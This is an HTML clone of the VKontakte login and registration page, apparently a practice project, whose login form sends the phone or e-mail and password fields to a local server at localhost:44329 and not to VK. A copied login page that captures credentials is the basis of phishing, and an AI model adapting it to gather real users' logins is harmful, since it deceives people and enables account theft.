<!DOCTYPE html>

<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8"/>
	<link rel="stylesheet" type="text/css" href="style.css">
	<title>Добро пожаловать | ВКонтакте</title>
</head>
<body>
	<header>
		<div id="wrapperHeader">
				<div id="logotype"></div>
					<input type="text" id="search" placeholder="Поиск" />
				<div id="titleEng">Switch to English</div>
			</div>
	</header>
	<div id="wrapper">
		<div id="leftcol">
			<div id="headtxt" style="bottom: 10px;"></div>
			<div id="maintxt">
				Вконтакте для мобильных устройств
			</div>
			<div id="subtxt">
				Установите официальное мобильное приложение ВКонтакте и оставайтесь <br>
				в курсе новостей Ваших друзей, где бы Вы ни находились.
			</div>
			<div id="pictel">
				<img src="images/pic.png">
			</div>
			<div id="refs">
				<div id="Android"><a href="#">VK для Android</a></div>
    			<div id="IPhone"><a href="#">VK для IPhone</a></div>
			</div>
			<div id="allpr">
				<a href="#">Все продукты ></a>
			</div>
		</div>
		<div id="rightcol">
			<form method="POST" action="https://localhost:44329/login">
				<div class="win1">
					<div id="help">
						<p><input type="text" class="log" id="firstone" placeholder="Телефон или E-mail" name="login"></p>
						<p><input type="password" class="pass" placeholder="Пароль" name="password"></p>
						<div id="btn">
							<p><button id="logbtn">Войти</button></p>
							<p><a href="#" id="forgot">Забыли пароль?</a></p>
						</div>
					</div>
				</div>
			</form>
			<div class="win2">
				<div id="fsttim"> <h2>Впервые Вконтакте?</h2></div>
				<div id="momreg">Моментальная регистрация</div>
				<p><input type="text" class="log" placeholder="Ваше имя"></p>
				<p><input type="text" class="log" placeholder="Ваша фамилия"></p>
				<div id="date">Дата рождения</div>
				<div id="select">
					<select id="day">
						<option selected="selected">День</option>
						<option>1</option>
						<option>2</option>
						<option>3</option>
						<option>4</option>
						<option>5</option>
						<option>6</option>
						<option>7</option>
						<option>8</option>
						<option>9</option>
						<option>10</option>
						<option>11</option>
						<option>12</option>
						<option>13</option>
						<option>14</option>
						<option>15</option>
						<option>16</option>
						<option>17</option>
						<option>18</option>
						<option>19</option>
						<option>20</option>
						<option>21</option>
						<option>22</option>
						<option>23</option>
						<option>24</option>
						<option>25</option>
						<option>26</option>
						<option>27</option>
						<option>28</option>
						<option>29</option>
						<option>30</option>
						<option>31</option>
					</select>
					<select id="month">
						<option selected="selected">Месяц</option>
						<option>Января</option>
						<option>Февраля</option>
						<option>Марта</option>
						<option>Апреля</option>
						<option>Мая</option>
						<option>Июня</option>
						<option>Июля</option>
						<option>Августа</option>
						<option>Сентября</option>
						<option>Октября</option>
						<option>Ноября</option>
						<option>Декабря</option>
					</select>
					<select id="year">
						<option selected="selected">Год</option>
						<option>2006</option>
						<option>2005</option>
						<option>2004</option>
						<option>2003</option>
						<option>2002</option>
						<option>2001</option>
						<option>2000</option>
						<option>1999</option>
						<option>1998</option>
						<option>1997</option>
						<option>1996</option>
						<option>1995</option>
						<option>1994</option>
						<option>1993</option>
						<option>1992</option>
						<option>1991</option>
						<option>1990</option>
						<option>1989</option>
						<option>1988</option>
						<option>988</option>
					</select>
				</div>
				<div id="regbtns">
					<p><button id="contreg">Продолжить регистрацию</button></p>
					<p><button id="fbreg"><img src="images/facebook.png" id="pict"><div>Войти через Facebook</div></button></p>
				</div>
			</div>
			<div class="win">
				<div id="tritext">После регистрации Вы получите доступ ко всем возможностям VK Connect.<br>
				<a href="#">Узнать больше</a>	
				</div>
				
			</div>
		</div>
	</div>
	<div id="foot">
		<footer>
		<div id="line"><hr></div>
		<div id="content">
			<div id="left"><a href="#">ВКонтакте</a> © 2006–2020</div>
			<div id="mid">
				<a href="#" class="lowrefs">О ВКонтакте</a> 
				<a href="#" class="lowrefs"> Правила</a>
				<a href="#" class="lowrefs">Для бизнеса</a> 
				<a href="#" class="lowrefs">Разработчикам</a>
			</div>
			<div id="right">
				<a href="#" class="lowrefs">Русский</a>
				<a href="#" class="lowrefs">Українська</a>
				<a href="#" class="lowrefs">English</a>
				<a href="#" class="lowrefs">все языки »</a>
			</div>	
		</div>			
		</footer>
	</div>
</body>
</html>